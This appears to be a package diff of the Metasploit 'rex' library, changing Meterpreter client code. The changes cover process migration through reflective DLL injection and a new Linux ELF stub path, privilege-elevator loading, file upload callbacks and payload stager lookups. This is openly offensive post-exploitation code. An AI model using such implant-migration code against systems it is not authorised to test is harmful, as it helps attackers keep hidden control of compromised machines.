rex 2.0.5 → 2.0.7

data/lib/rex/parser/openvas_nokogiri.rb

@@ -113,6 +113,8 @@ module Parser
       return if not in_tag("result")
       @state[:has_text] = true
       @text = nil
+    else
+      @text = nil
     end
     @state[:current_tag].delete name
   end

data/lib/rex/payloads/win32/kernel.rb

@@ -24,7 +24,7 @@ module Kernel
     payload = nil
 
     # Generate the recovery stub
-    if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'])
+    if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'], true)
       opts['RecoveryStub'] = Kernel::Recovery.send(opts['Recovery'], opts)
     end
 
@@ -35,10 +35,10 @@ module Kernel
     end
 
     # Generate the stager
-    if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'])
+    if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'], true)
       payload = Kernel::Stager.send(opts['Stager'], opts)
     # Or, generate the migrator
-    elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'])
+    elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'], true)
       payload = Kernel::Migration.send(opts['Migrator'], opts)
     else
       raise ArgumentError, "A stager or a migrator must be specified."

data/lib/rex/post/meterpreter/client_core.rb

@@ -25,6 +25,9 @@ module Meterpreter
 ###
 class ClientCore < Extension
 
+  UNIX_PATH_MAX = 108
+  DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
+
   #
   # Initializes the 'core' portion of the meterpreter client commands.
   #
@@ -68,18 +71,18 @@ class ClientCore < Extension
     load_flags   = LOAD_LIBRARY_FLAG_LOCAL
 
     # No library path, no cookie.
-    if (library_path == nil)
+    if library_path.nil?
       raise ArgumentError, "No library file path was supplied", caller
     end
 
     # Set up the proper loading flags
-    if (opts['UploadLibrary'])
+    if opts['UploadLibrary']
       load_flags &= ~LOAD_LIBRARY_FLAG_LOCAL
     end
-    if (opts['SaveToDisk'])
+    if opts['SaveToDisk']
       load_flags |= LOAD_LIBRARY_FLAG_ON_DISK
     end
-    if (opts['Extension'])
+    if opts['Extension']
       load_flags |= LOAD_LIBRARY_FLAG_EXTENSION
     end
 
@@ -87,14 +90,14 @@ class ClientCore < Extension
     request = Packet.create_request('core_loadlib')
 
     # If we must upload the library, do so now
-    if ((load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL)
+    if (load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL
       image = ''
 
       ::File.open(library_path, 'rb') { |f|
         image = f.read
       }
 
-      if (image != nil)
+      if !image.nil?
         request.add_tlv(TLV_TYPE_DATA, image, false, client.capabilities[:zlib])
       else
         raise RuntimeError, "Failed to serialize library #{library_path}.", caller
@@ -103,7 +106,7 @@ class ClientCore < Extension
       # If it's an extension we're dealing with, rename the library
       # path of the local and target so that it gets loaded with a random
       # name
-      if (opts['Extension'])
+      if opts['Extension']
         library_path = "ext" + rand(1000000).to_s + ".#{client.binary_suffix}"
         target_path  = library_path
       end
@@ -113,7 +116,7 @@ class ClientCore < Extension
     request.add_tlv(TLV_TYPE_LIBRARY_PATH, library_path)
     request.add_tlv(TLV_TYPE_FLAGS, load_flags)
 
-    if (target_path != nil)
+    if !target_path.nil?
       request.add_tlv(TLV_TYPE_TARGET_PATH, target_path)
     end
 
@@ -121,9 +124,9 @@ class ClientCore < Extension
     response = self.client.send_packet_wait_response(request, self.client.response_timeout)
 
     # No response?
-    if (response == nil)
+    if response.nil?
       raise RuntimeError, "No response was received to the core_loadlib request.", caller
-    elsif (response.result != 0)
+    elsif response.result != 0
       raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
     end
 
@@ -147,7 +150,7 @@ class ClientCore < Extension
   #		memory on the remote machine
   #
   def use(mod, opts = { })
-    if (mod == nil)
+    if mod.nil?
       raise RuntimeError, "No modules were specified", caller
     end
     # Get us to the installation root and then into data/meterpreter, where
@@ -155,11 +158,13 @@ class ClientCore < Extension
     modname = "ext_server_#{mod.downcase}"
     path = MeterpreterBinaries.path(modname, client.binary_suffix)
 
-    if (opts['ExtensionPath'])
-      path = opts['ExtensionPath']
+    if opts['ExtensionPath']
+      path = ::File.expand_path(opts['ExtensionPath'])
     end
 
-    path = ::File.expand_path(path)
+    if path.nil?
+      raise RuntimeError, "No module of the name #{modname}.#{client.binary_suffix} found", caller
+    end
 
     # Load the extension DLL
     commands = load_library(
@@ -176,84 +181,86 @@ class ClientCore < Extension
   # Migrates the meterpreter instance to the process specified
   # by pid.  The connection to the server remains established.
   #
-  def migrate( pid )
+  def migrate(pid, writable_dir = nil)
     keepalive = client.send_keepalives
     client.send_keepalives = false
     process       = nil
     binary_suffix = nil
+    old_platform      = client.platform
+    old_binary_suffix = client.binary_suffix
 
     # Load in the stdapi extension if not allready present so we can determine the target pid architecture...
     client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
 
     # Determine the architecture for the pid we are going to migrate into...
     client.sys.process.processes.each { | p |
-      if( p['pid'] == pid )
+      if p['pid'] == pid
         process = p
         break
       end
     }
 
     # We cant migrate into a process that does not exist.
-    if( process == nil )
+    if process.nil?
       raise RuntimeError, "Cannot migrate into non existent process", caller
     end
 
-    # We cant migrate into a process that we are unable to open
-    if( process['arch'] == nil or process['arch'].empty? )
-      raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
+    # We cannot migrate into a process that we are unable to open
+    # On linux, arch is empty even if we can access the process
+    if client.platform =~ /win/
+      if process['arch'] == nil || process['arch'].empty?
+        raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
+      end
     end
 
-    # And we also cant migrate into our own current process...
-    if( process['pid'] == client.sys.process.getpid )
+    # And we also cannot migrate into our own current process...
+    if process['pid'] == client.sys.process.getpid
       raise RuntimeError, "Cannot migrate into current process", caller
     end
 
-    # Create a new payload stub
-    c = Class.new( ::Msf::Payload )
-    c.include( ::Msf::Payload::Stager )
+    if client.platform =~ /linux/
+      if writable_dir.blank?
+        writable_dir = tmp_folder
+      end
 
-    # Include the appropriate reflective dll injection module for the target process architecture...
-    if( process['arch'] == ARCH_X86 )
-      c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
-      binary_suffix = "x86.dll"
-    elsif( process['arch'] == ARCH_X86_64 )
-      c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
-      binary_suffix = "x64.dll"
-    else
-      raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
+      stat_dir = client.fs.filestat.new(writable_dir)
+
+      unless stat_dir.directory?
+        raise RuntimeError, "Directory #{writable_dir} not found", caller
+      end
+      # Rex::Post::FileStat#writable? isn't available
     end
 
-    # Create the migrate stager
-    migrate_stager = c.new()
-    migrate_stager.datastore['DLL'] = MeterpreterBinaries.path('metsrv',binary_suffix)
+    blob = generate_payload_stub(process)
 
-    blob = migrate_stager.stage_payload
+    # Build the migration request
+    request = Packet.create_request( 'core_migrate' )
 
-    if client.passive_service
+    if client.platform =~ /linux/i
+      socket_path = File.join(writable_dir, Rex::Text.rand_text_alpha_lower(5 + rand(5)))
 
-      #
-      # Patch options into metsrv for reverse HTTP payloads
-      #
-      Rex::Payloads::Meterpreter::Patch.patch_passive_service! blob,
-        :ssl            =>  client.ssl,
-        :url            =>  self.client.url,
-        :expiration     => self.client.expiration,
-        :comm_timeout   =>  self.client.comm_timeout,
-        :ua             =>  client.exploit_datastore['MeterpreterUserAgent'],
-        :proxyhost      =>  client.exploit_datastore['PROXYHOST'],
-        :proxyport      =>  client.exploit_datastore['PROXYPORT'],
-        :proxy_type     =>  client.exploit_datastore['PROXY_TYPE'],
-        :proxy_username =>  client.exploit_datastore['PROXY_USERNAME'],
-        :proxy_password =>  client.exploit_datastore['PROXY_PASSWORD']
+      if socket_path.length > UNIX_PATH_MAX - 1
+        raise RuntimeError, "The writable dir is too long", caller
+      end
+
+      pos = blob.index(DEFAULT_SOCK_PATH)
+
+      if pos.nil?
+        raise RuntimeError, "The meterpreter binary is wrong", caller
+      end
 
+      blob[pos, socket_path.length + 1] = socket_path + "\x00"
+
+      ep = elf_ep(blob)
+      request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000)
+      request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep)
+      request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib])
     end
 
-    # Build the migration request
-    request = Packet.create_request( 'core_migrate' )
     request.add_tlv( TLV_TYPE_MIGRATE_PID, pid )
     request.add_tlv( TLV_TYPE_MIGRATE_LEN, blob.length )
     request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, blob, false, client.capabilities[:zlib])
-    if( process['arch'] == ARCH_X86_64 )
+    if process['arch'] == ARCH_X86_64
       request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
     else
       request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 1 ) # PROCESS_ARCH_X86
@@ -298,15 +305,28 @@ class ClientCore < Extension
       end
     end
 
-    # Update the meterpreter platform/suffix for loading extensions as we may have changed target architecture
-    # sf: this is kinda hacky but it works. As ruby doesnt let you un-include a module this is the simplest solution I could think of.
-    # If the platform specific modules Meterpreter_x64_Win/Meterpreter_x86_Win change significantly we will need a better way to do this.
-    if( process['arch'] == ARCH_X86_64 )
-      client.platform      = 'x64/win64'
-      client.binary_suffix = 'x64.dll'
+    # Update the meterpreter platform/suffix for loading extensions as we may
+    # have changed target architecture
+    # sf: this is kinda hacky but it works. As ruby doesnt let you un-include a
+    # module this is the simplest solution I could think of. If the platform
+    # specific modules Meterpreter_x64_Win/Meterpreter_x86_Win change
+    # significantly we will need a better way to do this.
+
+    case client.platform
+    when /win/i
+      if process['arch'] == ARCH_X86_64
+        client.platform      = 'x64/win64'
+        client.binary_suffix = 'x64.dll'
+      else
+        client.platform      = 'x86/win32'
+        client.binary_suffix = 'x86.dll'
+      end
+    when /linux/i
+      client.platform        = 'x86/linux'
+      client.binary_suffix   = 'lso'
     else
-      client.platform      = 'x86/win32'
-      client.binary_suffix = 'x86.dll'
+      client.platform        = old_platform
+      client.binary_suffix   = old_binary_suffix
     end
 
     # Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
@@ -339,6 +359,94 @@ class ClientCore < Extension
     true
   end
 
+  private
+
+  def generate_payload_stub(process)
+    case client.platform
+    when /win/i
+      blob = generate_windows_stub(process)
+    when /linux/i
+      blob = generate_linux_stub
+    else
+      raise RuntimeError, "Unsupported platform '#{client.platform}'"
+    end
+
+    blob
+  end
+
+  def generate_windows_stub(process)
+    c = Class.new( ::Msf::Payload )
+    c.include( ::Msf::Payload::Stager )
+
+    # Include the appropriate reflective dll injection module for the target process architecture...
+    if process['arch'] == ARCH_X86
+      c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
+      binary_suffix = "x86.dll"
+    elsif process['arch'] == ARCH_X86_64
+      c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
+      binary_suffix = "x64.dll"
+    else
+      raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
+    end
+
+    # Create the migrate stager
+    migrate_stager = c.new()
+
+    dll = MeterpreterBinaries.path('metsrv',binary_suffix)
+    if dll.nil?
+      raise RuntimeError, "metsrv.#{binary_suffix} not found", caller
+    end
+    migrate_stager.datastore['DLL'] = dll
+
+    blob = migrate_stager.stage_payload
+
+    if client.passive_service
+
+      #
+      # Patch options into metsrv for reverse HTTP payloads
+      #
+      Rex::Payloads::Meterpreter::Patch.patch_passive_service! blob,
+        :ssl            =>  client.ssl,
+        :url            =>  self.client.url,
+        :expiration     => self.client.expiration,
+        :comm_timeout   =>  self.client.comm_timeout,
+        :ua             =>  client.exploit_datastore['MeterpreterUserAgent'],
+        :proxyhost      =>  client.exploit_datastore['PROXYHOST'],
+        :proxyport      =>  client.exploit_datastore['PROXYPORT'],
+        :proxy_type     =>  client.exploit_datastore['PROXY_TYPE'],
+        :proxy_username =>  client.exploit_datastore['PROXY_USERNAME'],
+        :proxy_password =>  client.exploit_datastore['PROXY_PASSWORD']
+
+    end
+
+    blob
+  end
+
+  def generate_linux_stub
+    file = ::File.join(Msf::Config.data_directory, "meterpreter", "msflinker_linux_x86.bin")
+    blob = ::File.open(file, "rb") {|f|
+      f.read(f.stat.size)
+    }
+
+    blob
+  end
+
+  def elf_ep(payload)
+    elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
+    ep = elf.elf_header.e_entry
+    return ep
+  end
+
+  def tmp_folder
+    tmp = client.sys.config.getenv('TMPDIR')
+
+    if tmp.blank?
+      tmp = '/tmp'
+    end
+
+    tmp
+  end
+
 end
 
 end; end; end

data/lib/rex/post/meterpreter/extensions/priv/priv.rb

@@ -46,8 +46,9 @@ class Priv < Extension
     elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
 
     elevator_path = MeterpreterBinaries.path('elevator', client.binary_suffix)
-
-    elevator_path = ::File.expand_path( elevator_path )
+    if elevator_path.nil?
+      raise RuntimeError, "elevator.#{binary_suffix} not found", caller
+    end
 
     elevator_data = ""
 

data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb

@@ -203,10 +203,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
     alias delete rm
   end
 
-        #
-        # Performs a rename from oldname to newname
-        #
-        def File.mv(oldname, newname)
+  #
+  # Performs a rename from oldname to newname
+  #
+  def File.mv(oldname, newname)
     request = Packet.create_request('stdapi_fs_file_move')
 
     request.add_tlv(TLV_TYPE_FILE_NAME, client.unicode_filter_decode( oldname ))
@@ -215,12 +215,12 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
     response = client.send_request(request)
 
     return response
-        end
+  end
 
-        class << self
-                alias move mv
-                alias rename mv
-        end
+  class << self
+    alias move mv
+    alias rename mv
+  end
 
   #
   # Upload one or more files to the remote remote directory supplied in
@@ -246,9 +246,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
   #
   # Upload a single file.
   #
-  def File.upload_file(dest_file, src_file)
+  def File.upload_file(dest_file, src_file, &stat)
     # Open the file on the remote side for writing and read
     # all of the contents of the local file
+    stat.call('uploading', src_file, dest_file) if (stat)
     dest_fd = client.fs.file.new(dest_file, "wb")
     src_buf = ''
 
@@ -261,6 +262,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
     ensure
       dest_fd.close
     end
+    stat.call('uploaded', src_file, dest_file) if (stat)
   end
 
   #